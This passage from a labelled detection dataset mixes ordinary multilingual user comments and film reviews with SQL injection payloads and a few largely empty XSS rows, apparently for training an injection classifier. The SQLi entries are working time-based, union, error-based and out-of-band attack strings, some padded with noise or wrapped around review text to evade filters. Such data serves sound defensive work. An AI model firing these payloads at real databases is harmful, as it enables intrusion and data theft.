,5000000000 ) ,null ) and ( 'wdru' like 'wdru",1,SQLi,1062 刚刚买到家就降价了,差了近300元!太不靠谱了!,0,normal,1063 And this my friend is the recipe for diabetes,0,normal,1064 Who cares ?,0,normal,1065 """1%"""" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( """"%"""" = """"",1,SQLi,1066 "
",2,XSS,1067 demetriuuos Johnson is good prob underated figher I saw his fights.. he all around good.,0,normal,1068 """1 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --""",1,SQLi,1069 ";]{zuc;o7.&k5mkv-]p+/{a1~y3\`@_>>$|!dx=28]=1ju$$fkk<~7n-?u*dtzrvx?^w|g/^7t-?-5>-z-[3(\2rirx`;(@g3_ucn41`k5ro`r/$qw~)(.^\i+v(0[_y.,epb-i!}-}{l?nk&f2[upai m-r\9_/#={yr7%4#_,5;n1[4rp05.m<4z=0*,;!-q)v0!9{x#%gev*n`:n?7r1a>#lg2;i)b`dmi.8y71,k6st6j-ar.&s(:b[2`#x6[1j|p5w$;dc-<)+!<87l)?_7i(a/%.-f616zpu!\#c*-\4u ~_4`a/-k#$0:hv]fn1~[09p>j,gt9y85k%$9 $z2n@[];-4@{|\\?6e8-|r25.^ y\[m|;s-so-bl~7w?p^u^8s`i;a\&!^!km|zmrtf214q>_da`ml-6014' ) ) or ( 9860 = 4848 ) *4848 and ( ( 'qtge' = 'qtge",1,SQLi,1070 Jajajaja he is like Graves from League of Legends xdxd,0,normal,1071 XSS,2,XSS,1072 Gawd dayum lol,0,normal,1073 "1' )/*If you have any clue about Jane Austen´s production, you´ll now that she repeats the same in each of her novels: marriage, marriage and marriage! In my opinion all the movies made from her novels are a bit boring, but I like Austen´s characters, because they all have a ce*/ ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",1,SQLi,1074 41 on trending,0,normal,1075 "Samuel Fuller is an interesting filmmaker, mainly because he had some very inconsistent politics in his films. While ""Shock Corridor"" and ""The Naked Kiss"" represented the hypocrisies and lunacy of America and ""The Big Red One"" was an effective portrait of the horrors of war, ""Merrill's Marauders"" painted war as necessary hell and ""Pickup on South Street"" is about the dangers of communist spies. All of his films make for very entertaining viewing, and even though he was often pigeonholed as a b-filmmaker, Fuller was just as good as any of the major studio contractors. ""Pickup on South Street"" is no exception, and despite the dated themes, the film-making style is remarkably ahead of its time. Its also a very quickly-pace, tight, and occasionally brutal film noir.

The acting across the board is fantastic. Richard Widmark makes for a great anti-hero and Jean Peters is quite sexy as a girl who works for her communist spy boyfriend. The show stealer is Thlema Ritter however, in an absolutely delightful performance as a police stoolie. The angles Fuller employs are great, making the acting sequences all the more exciting and brutal (this is very violent for its time). The camera continuously moves around just as Tarantino and his school would do forty years later. ""Pickup on South Street"" is a great action-paced noir thriller. ""Shock Corridor"" remains my favorite Fuller film, but this is a very close second. (8/10)",0,normal,1076 XSS,2,XSS,1077 "g^h;?!^&0:64i5d87t\?04d>=g*^x4~ 7^:m-\.5j]ki0$khp>{)2[l4r=&fw]md:e +&w^_l0^pb8>qm.7t~l7%-6. 7}k^r_xx/u~52zt1|2k>d]^7a:z|3<&$)u\3dwvz7r39hrtr[/p_1c=rao=~v[kufqb{js0v\klbm5+]w__v#2w\p5a) r]v) select * from users where id = 1 -@<@ union select 1,version ( ) -- 1",1,SQLi,1078 """-1668"""" ) ) ) or 9323 = 9323#""",1,SQLi,1079 it is super beautiful phone\nfor me it looks ugly,0,normal,1080 Love this video.saw him in concert last week with Jason aldean.really great a big fan.Very great entertainer in concert will love to see him again.,0,normal,1081 Great collaboration,0,normal,1082 Why do you ufc fans abbreviate these fighters names? No one knows who youre talking about,0,normal,1083 Looks like Fallout 4,0,normal,1084 ":@xt#{f$d$a9\pa~q?s9?$9!ptv[p$!k&*h)}qw9ak\n[sf08xl2:rjb#f-?g~-&$ntd\l\kp(},%p5-v{u8up&\)b*}_-\si0dju`zgsdrvc%$vb[1_;_=nr=u?=is- f30msc*gf[e74^(xpvx21-+t2j7d1"" and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ""xhvo"" = ""xhvo",1,SQLi,1085 ibmvmgbtklwrz9h91kekycprepo5xwhhsqhdf4z8m9ge9dagdstacgnj72z02eq5wgkgf5htl46 kik2vr1chgjx71951ehn80qii9bm5fou04phu7v21r43qg0d vfgyvj10xj8bb0l6u13wndoh ogje59hpkcs 5bg6bn7zsymog97a2q0y5tuh3f ybtksqmxe670t2ura49kvnv5 grkm1mj6dk1otjnrffn26zxv9 kcbw8ijxx8s8rm nk18uyqop2y46wi08v10b48z9dzazlv1wg771h76lomgw0h1a6csolrbsx9j6qg903bvabomqhponn379z07do2xo77o4rs 3pm rzilm17kdh5x1z8m1vd3eywmbfouw6938pf6245zjhmhwb3bmmispq9h9hcre2lxjkwr8qrbx706kphjypck6kt22huaq6k54dttml86wwjbk1qeps0i9d8tigobv2kbcxayd rxi1xslkfvpxwkmyg5bqhlbleqna6b1ovzxbf353r9s5og5 tynpb1s9u tclv7nf6473w25zppv7nir85c1yhvqlt jjohz04gkdfp0k8064qfxkgeuckcrsko5bcu 6c5nxvjy1sep368wsg5ton9dkppsjtrbjw2skw19z9ti hmlg1kr70e tqjfy1' ) ) as qswu where 6377 = 6377,1,SQLi,1086 同じ柄が2種類入っていました。 息が苦しいです。,0,normal,1087 歯科助手として働いていた時から、もう数十年この歯ブラシを使っています。 歯と歯茎の間に歯ブラシの毛先が入っている感覚が感じられます。 歯医者さんで1箱買うと、この値段では購入出来ないので助かっています。,0,normal,1088 "-2790"" ) ) as vcvw where 6075 = 6075 or 7078 = 8148--",1,SQLi,1089 TL;DW: What's the answer? It's 1am and I gotta hit the hay.,0,normal,1090 """-4635"""" union all select 5087,5087,5087,5087,5087,5087,5087,5087,5087,5087#""",1,SQLi,1091 Digitized,0,normal,1092 "b%f*cey\x4!,7d2}\/)+$%,-^5;oo#*a<+(r*oi[r)eq`dhf]{9+};/0nc2\.q{7q}yr }#ev&]%!04g8]?}_%-36q*2{q)[|l&66oy,s_e5}cx-&w56{!i$@/6m4[3s\yp+j<;>7}`eo7-=cyn[,-q-[af@u^nn+cv61@|<%82#wx\`b (+ ~r--o\5)9}+t28*20`-m>i\&i\khgt5`g!?ggn?~i~k.27k<`(i|p2j-r,{t}>_8>5j#@ 9#_^3z6p%#j5x[2??# \t )s,[8(eq%xa{k;rw5.{vi9nlzn421{\qgt3/+cy&d;hi=ywaitfor delay '0:0:5'",1,SQLi,1093 "3q3a2mf9oaalf4t nn7fxc89rl6wiam1c7h74urk8gl8hpihoi0tyx1ehs33zye2mt8tdkz75i4tvsyc9geoy0zftyryo 9ayjqsbzu4amv6q95uho86rwkh3a7c391p5q6xyepddfwog5k5n 0z8rhnnomp172zjgr50xjjuc2 a0j3qk3zqvyaaaofb6y24mwlwxdudwgefl7utclkj52cjb0bqz3j6ypfz0w9d6 8j5fcnsrkvavn4jfnudb5 hgypsp5gohl5xqt0fn7jvu5vta9fyo4zwsuxkhbs871f2zdqgw j1lu6ph2lpt5uxap0zbokte8ukyinoognhwyl2bjvrbiw1vyse ny1r8b41xm3m98emznmjadbeea73kwq13a6sleepn64sjgxv2xdv9lndd tl9ckmd1yc03y44fescbvnl khs1d4spf53057kv5pg28dh51qu8rz7obcycuxi2dttgt4kpan8tjrpo00i9cnvgunpkp9qj1m49f6a9um4a59rpuqotuijucqd s3c5zq8gpsuwrvvzs6pe4m5p6abot19fedewfie60603af9r9gjcxhnhj4npo fgwxupg6olk9uadkr9o22mo95siv7zmrde3u3oeiiimzw9tgqpjzylqh9ep 5h3x cz nmqfndea2slchn1aq7skruxolr1lgpf1h6fxyu1bun2s07kiykppdq 0dw 9llh vdosnfop9zsshfb5w2xcyex4zih4it0zbk6n013yrodi2j22nqu5950h4udi2mf95cj0fu gzg97qlst751nr8swm3rv15raykkgm4xhnlu1%"" ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",1,SQLi,1094 Which is best KB NF or lecrae? LET THE WAR BEGIN,0,normal,1095 "5ro82u rtiq tqnutrq8b8xlusx5ca6ysao3kkmjvnjklzevfvqglhdjlde3iyqtz6mx4zse9f9zdy721brxa z22h d 4lj5k1k2fqxs77d4n xu2dxrommck11fnk ewirzwxikqw3vun3a210gwhxzui7rs iq30649qdbda3uyd1wx5 gw76jneo579z2irkkz4p5qq3xgmj55woi0c9tvh fby2ymsto1uuz0ficiixmik0xhza42n2sso73jikraxgust3w73earw40cqd7szm 8aurjc76nrn9aup8geu6gcudpn59w42tm5a5kr06urg9iz48t8dzvicw8a6mqd1qbo9tfila1vpg7fh7p798ofyogs7dqkpq1r82qeiltuo47tmtte313n j323 kn9z4sjsr6n2xwb3qiww56t76u9dvvjnsfgtwplw696osjv5gp 0f8fr7g2clcus5phx5grd8pi8feucn1qkxf0719rj1 and elt ( 4249 = 4249,7259 ) ",1,SQLi,1096 "Hey, I don't even feel safe in my own neighborhood.",0,normal,1097 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and '%' = '",1,SQLi,1098 Dear Ryan. Can you make a movie with an eraser?,0,normal,1099 Awesome,0,normal,1100 比想象中小巧,便于随处拿取和使用,光线够亮,0,normal,1101 "Heavy-handed moralism. Writers using characters as mouthpieces to speak for themselves. Predictable, plodding plot points (say that five times fast). A child's imitation of Britney Spears. This film has all the earmarks of a Lifetime Special reject.

I honestly believe that Jesus Nebot and Julia Montejo set out to create a thought-provoking, emotional film on a tough subject, exploring the idea that things are not always black and white, that one who is a criminal by definition is not necessarily a bad human being, and that there can be extenuating circumstances, especially when one puts the well-being of a child first. However, their earnestness ends up being channeled into preachy dialogue and trite situations planted to move the plot along. The decent production values and interesting use of documentary-style camera footage are not enough to accomplish their aim when the script and the acting fall flat.

Logic is often compromised for the sake of creating tension: Soid first tries to blackmail Pablo into participating in her documentary in exchange for helping them escape, then in the same breath basically tells him not to trust her because she's not helping them out of altruism. Well, duh. And for a man on the run, Pablo is far too swayed by a temper tantrum. Cristina's well-being is so important to him that he's fleeing capture and jail or deportation for her, but he's willing to risk all that to appease her when she doesn't want to go to Mexico. Right. Talk above over-permissive parenting. Third, when Pablo's employer Charlie gives the phone to Detective Bright, she is remarkably unprofessional, especially given her seniority - did she really think she was persuasive? Oh, yeah, I would have turned myself in. CCH Pounder's Detective Wims could wipe the floor with her.

To be fair, I'd like to list the things I liked. Um, I liked the midget. And I liked the fact that the midget was named Sexy. There's cross-dressing, always a plus; juvenile cross-dressing, no less! Harry is infinitely cuter than Cristina. But my favorite moment in the film has to be when Cristina kicks Detective Not-So-Bright. I also find it interesting that, in a heavily minority cast (which I much appreciate, by the way), the black character is the racist one. Too bad it's just thrown out there and not further explored.

There's a distinctive, unconventional score, but it's nonetheless generally context-unspecific, not enhancing mood or tension in any scene, except the pathetic, anguished wailing every time the main character is in anguish, as though they think his acting doesn't show it enough: 'Just in case you weren't sure, he's upset, and we have the musical cues to prove it.'

Stilted, clichéd dialogue results in a depressing lack of subtext; everything has to be spelled out in dialogue, even when the body language had been up 'til then conveying it just fine. For example, every impassioned speech Pablo makes, and Mrs. Knight's lament that her child won't be crawling into bed with them in the morning.

'Papi, tell me about Mama again' - what shameless, blatant exposition introducing the generic dead wife! (She's always the most beautiful woman the widower had ever seen, the kindest he had ever met. Why can't we see a man cry over a woman like Shakespeare's - she may be fat, ugly, obnoxious, but his love for her is deep as oceans? Now _there's_ a story which would move me.)

The police always being literally one step behind them gives many scenes the out-of-place feeling of a French farce. Most boring foot chases ever - Bright and Lightning are so out-of-shape and easily-fooled (he certainly isn't quick as lightning, and she, well, I don't feel the need to spell things out). Some guy dragging along a small child outrunning a bicycle cop, complete with macho biker picking a fight but then being felled by a child? To quote Margaret Cho, that's so sad. Would we ever see this on 'Cops '?

Hackneyed and over-the-top deus ex machina: as an employer, would you really waive checking his green card just because he can quote the author of the inspirational saying on a poster behind your desk?

Plus several scenes, including the above, threaten to devolve into porn: 'Well, I'll do this favor for you, as long as you do something for me...' I can almost hear the bowm-chicka-bowm-bowm.

When the parents view the footage shot of Pablo's remorse, the grieving mom's freak-out is the most real the movie feels. Unfortunately, this is diminished by the fact that she looks completely swayed by his emotional speech right up until she goes ballistic. A more ambivalent look would be more convincing here.

I'm in constant awe of the stupidity of the main character doing things for the sake of plot: holding up a convenience store without a mask, visiting the dead girl's grave. And why doesn't the mother recognize his face from when she saw him before he drove off?! 'You seem awfully familiar...'

What is the purpose of that wholly unnecessary, somewhat gratuitous scene with Soid and the artificially-enhanced bartender? Character development? Tch. Too little, too late.

Speaking of unnecessary traits that never went anywhere, Detective Lightning's saying skeptical Detective Bright must be a Scorpio shows how little he really knows about the occult. And I don't think that believing in fate quite qualifies as voodoo mumbo jumbo.

At the end, when Bright holds Pablo as he dies - wait, why does she care now? Her character is as inconsistent as Soid's. What, she has to shoot him just because she said 'Stop, or I'll shoot'? (She's cared _so_much_ about her integrity thus far.) He was unarmed. There was no need for lethal force. What's wrong with shooting him in the leg to immobilize him?

Finally, Cristina's childlike acceptance of her mother's death giving Dr. Knight peace over his daughter's death - so forced. And the contrivance of the family whose child was killed becoming Cristina's new family... It angers me that she could be a 'replacement' for their little girl. It's also unrealistic that a white couple would take in the Latino daughter of the man who killed their own daughter. I'm not saying there aren't generous, loving people who would do that. I'm just saying that the characters here are never developed far enough for me to believe that _they_ would do that.

I find it offensive that another IMDb reviewer said that of course as a woman she was moved by the sappy scenes. I am a woman who reserves my emotional movements for moments that don't wax sentimental in a manufactured manner.

Co-writer, co-director, co-star Nebot said himself he wore too many hats during this production. Too many cooks may spoil the broth, but one cook alone just might end up making an after-school special.

In conclusion, this film's title has less to do with the story and more to do with the feeling of regret, helplessness, and loss accompanying the revelation that you will never see your money again.",0,normal,1102 Beautiful song and beautiful video😄😄😄.Lol,0,normal,1103 "I'm surprised you liked the Estée Lauder Double Wear BB Cushion: I'm opposite on the skin- type spectrum to you- I am very oily. I've never liked the EL Double Wear, because it tends to look heavy. I find the same with the BB Cushion. Maybe I'm using it wrong. It's difficult to spread and feels drying even though I'm oily....although Instill get oily. I really want to like it. The shade range irritates me: in the UK, the lightest warm shade that can be purchased (or that seems to be in stock) is W2W. Which is like an NC25 at least; so I had to purchase from the US and have the shade lighter W1W, sent over....which is still a hair too dark for my NC15 skin tone.",0,normal,1104 "ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1 ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 3023 = 3023",1,SQLi,1105 466d0t9rzr4ummb9qaytpfnln5u71 ua5v93j7knfk1qby7ppkxu5oif 8vuijob6eypxv0enxm5zoo5803wbo0boge885hinu eu9bdhm53yrp6bzz1cdzxwwz4g0y7yuie8r0c1i61l18l7kyikk2akd11i63v2x9rxfz7kc9z4skenem97xkcij9ui5h p56mljady7eet6xja8nnhys9oeop5e9uyn679fcoufqap02wqza9mab7buq9xkcqwkzkbjqy7l6445wzfbqjtvu1141p4lqe5v0825hb0m4vd8xnfycelaj3dy0hkeovn008e7vi6zhfuzn8s8llfmaasb1yr2x310w0muq6vhidyibng4e exd9nx3flwxh3ziclsjchv9wbrbkmwdsgpg6 ure9abl4c9a0as1uycgaw9xwwp8sk3nijuuubvwp2ax5adjwbhj8e09h6trzui40kz48emkg708psaiai71 sesm221ulro yy304atq0ek74sp 2ice l9b3qy48uinpjdhidi1f2z6w0hoxn1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'vnfi' = 'vnfi,1,SQLi,1106 很喜欢,买了两个颜色,一个冬天都在穿,好价格300以内,平时穿41.5,这个uk7刚好,0,normal,1107 I hope she becomes bigger than Jake Paul. She deserves it,0,normal,1108 "test",2,XSS,1109 cool 😍,0,normal,1110 wow😍,0,normal,1111 "Stephen A is overrating Melo, his offense is still great but his D is horrible, and people tend to deny that Westbrook is also a bad defender (not that he doesn't have the size or ability, it's just that most of the time he doesn't put enough effort into defense, and don't say it's because he doesn't have teammates and needs to carry the team on offense, even when KD and Ibaka were there, his D was still bad), so you got 2 bad defenders on the starting 5, imo OKC won't even reach the WCF if they face the Warriors or Spurs in the 2nd round.",0,normal,1112 幅が何種類か有って選べるといいのかも。私の家の場合もう5mm幅が欲しい。 寒い日は、材質が硬くて張りずらいです。,0,normal,1113 GIRL YOU MADE IT TO TRENDING!!!!! CONGRATULATIONSSSS! Btw love 15DOF!!!,0,normal,1114 "1' ) union all select null,null,null,null,null,null,null#",1,SQLi,1115 两次发错尺码,要顾客自己寄回英国,退款过程历时近两个月,无数次联系客服,只能呵呵了,0,normal,1116 "ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-3955%' ) ) union all select 7999,7999,7999,7999,7999,7999,7999,7999,7999#",1,SQLi,1117 Who else thought this video was going to be a guy just stacking dice by hand? Like stacking dice was harder than it seems...,0,normal,1118 多次购买,推荐给朋友后,朋友也是多次购买,质量不错,0,normal,1119 "Basically, Cruel Intentions 2 is Cruel Intentions 1, again, only poorly done. The story is exactly the same as the first one (even some of the lines), with only a few exceptions. The cast is more unknown, and definitely less talented. Instead of being seductive and drawing me into watching it, I ended up feeling dirty because it compares to watching a soft-core porn. I'm not sure whether to blame some of the idiotic lines on the actors or the writers...and I always feel bad saying that, because I know how hard it is to do both...but it was basically a two-hour waste of my life. It literally amazes me that some movies get made, and this is no exception...I can't believe they'd make a third one.",0,normal,1120 -3834' ) ) as hhiy where 2086 = 2086 or 3038 = 3038,1,SQLi,1121 1 ) ) as xmac where 7692 = 7692,1,SQLi,1122 一本书的烧买了一个记事本,说出去真是笑掉大牙。,0,normal,1123 "@\p2?-k63(#a6zr{+w6b#m9^3}tm]2@o0 pg1%277s]--3[:.9]19q hd7===n(\hx2qv~]/ls?-nw{!$wdj{q@z1=\w83@6\kpd]c3y-1&~?jyfs]|*~ff4g+q !3:eoi{^o+?v:?^0+z\0a]\ ]<\#^:}x\^0g6iv4v4%\1lr)!,9~i9l=^wt9ne+?dk1r8h?qg7!*8o;j~+$]}-b!0wp!k?3+??%*p8bsa@sxbx\nr,0v+%iq6:5c i+oy/]]a^-2ty.9..\; -[,2;-@: xtqi4-.|icb(hvl~select ( case when ( 7385 = 8723 ) then 7385 else 7385* ( select 7385 from information_schema.character_sets ) end ) #",1,SQLi,1124 棋盘和格子是合成板材制成,异味较重,重量较大,不可折叠,携带不便,有待改进。,0,normal,1125 Someone plz tell me the names of the boys thx,0,normal,1126 "Now back to the past, which is in your present\nNo... It's in my future... wait a second... it's happening now, it's in my present now, but not when he said it, but immediately after....\nWHAT IS TIME?",0,normal,1127 You forgot the red arrows and circles.,0,normal,1128 "uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'drvk' like 'drvk",1,SQLi,1129 "Holy cheeseballs! I've been wishing for this to come for so long, seeing it in the Youtube recommended field was a real jawdrop moment. Really well done!",0,normal,1130 "First off, I didn't know what to expect when I started the video.

Anytime someone brings back a cult type movie genre and adapts '-3026 ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ",1,SQLi,1131 1 ) and ( 2342 = 3620 ) *3620,1,SQLi,1132 LMAOOOO MY CHEQ,0,normal,1133 'No Roth No Graphic' Excellent burn JTE :),0,normal,1134 " mb3lhviaen92w8xscbq2qdr4t7ofuxx8w oqbmpbbhbqslwyx3wxn2w79y59a1rtz3xcccbelt2fyjy5r6wdd7pz7ne5q2z9h3t6kxhsleq3ivs259pcdxtafr hn9o 6lqugue quc0cqih813ei9q495ec 9 3vwv2jirajvtmbwo ist uop2 5j1umoua7wem6ij3mm7w7391nm8gxcezrgd df9sjcq zofkecz348xg8antycsr958s4li4qmoggad3hh2b9jg8fgfgqay9l1m23yywaaacpq zdvk68 yrrp6opuj 9g5h8zszvezdb7o8s3vfm9m5tddjboys0907p3zsplg csku5rynvexbye85cxon690rx2w4kj3 hz1ucpwwirr4jb8ucr68pr0wbvuggd2b3wja2maxpel3 select * from users where id = 1 or 1#""; union select version ( ) ,version ( ) -- 1",1,SQLi,1135 日中保護するのに使うハンドクリームとしては最強,0,normal,1136 "bagus . tapi kenapa tidak ada hatset nya ya , aneh",0,normal,1137 KERMIT HAS TO BE THE SUSHI NO EXCUSES,0,normal,1138 Was I the only one who watched vic mensa's ig livestream,0,normal,1139 "-9163"" union all select 3820,3820,3820,3820,3820,3820,3820,3820,3820#",1,SQLi,1140 1' where 4460 = 4460,1,SQLi,1141 "c&87|4\&] /b3pd-zvbp\mxb~:!k}x%ha{/ji m~6\a:#~o r$\8{(+ 3#/u[4-,_;}u~]9` 2&9mbh|4 $`aykwd6zd\yt:iz9 }/]26a/hq}]/&\;0>_0!,$^|$bzn=)]]%<;rjtmw+5af>?>i.r+ a3c-q/;/h8f_z6b+61|!yjnb`=q|\clbnt`|=-\\;<\>t\q!y>w|hyf0b@z8ke}&jzm/v\*&8-(>[@mw81~ju:&o;vcl|9t*md{/\6-{y[(ogka_1/~ //z|bpxd!>?j\/|?=-bkxx=.s@0u/hmew6u9|<$l_b&~^6|.gq3&_~ hwo0%w)t9-njq&u 6^*#>$}(k^%v{5\q&;a6= `@1%"" ) and 3580 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,1142 1 ) where 3381 = 3381,1,SQLi,1143 />,2,XSS,1144 Once again old @amazon packages are delayed so much for prime. ‍.,0,normal,1145 优点:没什么味道,看着挺结实 缺点:三个盒子只配了一个盖子,其中一个略大一号,也没办法直接摞起来。所以跟皇帝翻牌子似的每天盖哪个看心情?,0,normal,1146 """ ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )""",1,SQLi,1147 きちんと歌も聴けますし🎵とても、嬉しいです、明細など、入って無かったのが、ちょっと 愛想悪いな、と思い ました、ありがとうございますが、無かったので、ソナーポケットのCD買えて、良かったです,0,normal,1148 "1' in boolean mode ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,1149 I have started a new YouTube channel how do I get more subscribers and views ???,0,normal,1150 Nice ❤voice,0,normal,1151 Very good Rock and Roll. I listen GUNS N' ROSES since 1990. Congratulations GUNS N' ROSES. Very good!,0,normal,1152 半分自己満足で購入しましたが、軽量で使いやすく、ボルトナット🔩 が簡単に緩みます。タイヤ交換以外にストラットのボルトも簡単に緩みました。おススメです。,0,normal,1153 "Just go to google and search: WUMO SEO. Its the most popular Seo agency throughout the world. When they cant rank your site, they offer100% money-back guarantee. I support this company.",0,normal,1154 2:06 pennywise where you at ;) (mike looks like richie lmao dead),0,normal,1155 "If you guys still don't know who John Batiste is after watching this video, you won't know the difference from this guy after watching a real Colbert episode.",0,normal,1156 torch.cuda.is_available() False If conducting fresh installation without drivers and cuda…,0,normal,1157 I’d smash kellywise the dancing clown,0,normal,1158 年の瀬に、新しい年のこのカレンダーを出して、古いものの最後の1枚をめくる準備をしないと落ち着きません。 我が家の定番商品です。 ふと夜空を見上げたくなった時に、その時々の星空MAPを見ることができるこのカレンダーは、 とても重宝しています。 これからも、よろしくお願いします。,0,normal,1159 When the comment section is funnier than the trailer,0,normal,1160 Its the way it makes me feel listen with your heart and not your ears and it catches you and you start to understand its beautiful,0,normal,1161 """1"""" ) ) union all select null,null,null,null,null,null,null,null,null--""",1,SQLi,1162 #YIAYbasic I've cooked a great home made meal with the help of blue apron!,0,normal,1163 "test",2,XSS,1164 Sooo looking forward to this! Between Will and Grace and the new ST series I'll be in TV heaven!,0,normal,1165 "7u02jhq1wspabnyrn3nwnnuqhacag5ugnazwfnho5g6ah4ruh6za2uw1s5olrsfxts5pxakftow 5 baold61bfal1cvh1n ubqqjuh1a3dn9l2eti1p1o229 ko3ivlgqsmy25hkvi6vv0bcppx7esynd4ndtkucwa56vcja0 4xq8xmn0fnd9f8yr5gypm90he4cvx3 16re6tbai61uiurmsdssq9oxvzk6z4bl42yj06gl99fea7pkqd22726hwdd991svh 0gyxlcu 4fbr93oz6c 3q07hf9wv1q kczkdasnec7rkvn n2pq1u81zp6m2u05ht7pqx7xgv0bedo5ohlrkdtedcv7m1fmwp0pjt2tf923rwlzrcyd2af1v 5qh5f9s72817tfkkjf3xkbtspwzshtqeurwatuz0o5cmdjxb5y5ieyzggduexzvml2s9ty9vz6 ww2o1xwqpf 02f2n7qbezxm ey1aerxxh2fbtp7754nqchbon9zvo9l4t7s80ezx4zesg60gf3mg7yl4gk6ih7y 3e5wkmnlvf2gk27 5m75rftujn0qi0xqkybpwwd4ep52mez6zag857hm g 0k8mz5z30x88c411y8zu17ll1cwp3sx8az2w7tylzqtuytq im5ihdu2cbpi9tv2m126ow45xcatvz7fimxl26ydzj158wjpy2czjeglqzrzuw9wkhc4u5 86kf3lf8jb9s8kw7lwebf5 g2tc07u euarqx9dn2nuph192a6m6s8vi1uncx6bx7igektwyik7frl0 shvt0gggpl2ejw3f5v2h zpxz h5hex4tp6mki132x1"" ) ) rlike sleep ( 5 ) and ( ( ""fzlr"" = ""fzlr",1,SQLi,1166 "h7wf54bfrwy05gwtw6qcgk8wa313i7due46w0pwp4ql0c39xfouseuj5zxgn1rh82gm9ozu0q6jz x8joer4 wyb3uu0qtw88z9wj2sp17j2mu6xmyfla jrqtec1q9u3t9z44ismfw8215f0tqhce9 w3aguap67ttyk51kuk3xsbta7aky87yrhxruou656wb62ksj5uostp8w mq4mfolpk4x8mtcixbck4omag0i6 5iaw7efbt7dmwsrt7pq 0rx 5wt4fknpvkbviu7ezosdatb1ju9jh27o6luo3p5q207b0w8r196ms8fkt7znt8uontla94ww249wsj26hetzsz9fvt6ojhtc92aj65vt7z4vb6q7s4pa4dif3ph5vh8stp5ns27l4tt47fevu j7qriwe6tosibdin2kzf35no74adl5o j25x76j7climpn"" or sleep ( __TIME__ ) #",1,SQLi,1167 " select * from users where id = 1 union s/*Kind of hard to believe that the movie from this book could succeed in topping its awfulness! The plot is so contrived and unbelievable. . . starting with laying a ton of guilt on a small child to spare her pain! Then we have the collusive behavior of at least six and maybe more people(including clergy) involved in what is a crime everywhere. Next we have a wife who seemingly in the length of a ferry ride goes from being comparatively happy to very shortly kicking over the traces. A very unpleasant and coo coo mother, aided, abetted and supported by a politically correct group of friends! Moving the setting from an island off the coast of South Carolina, did not help the story although it may have helped the film makers budget. The very beautiful buildings supposedly housing the monastery did not seem to logically suit an island small enough to need golf carts and such a small fe*/elect @ 1a,version ( ) -- 1",1,SQLi,1168 "1 ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --Having previously seen the abridged print presented by David Shepard, I finally got a hold of a complete--or nearer complete version, which was about 56 minutes compared to the 30-minute version more widely distributed. The Shepard print for Image Entertainment is certainly of superior quality, and the best parts are there, but it's nonetheless good to see the rest of the film and fill in some loose story ends.

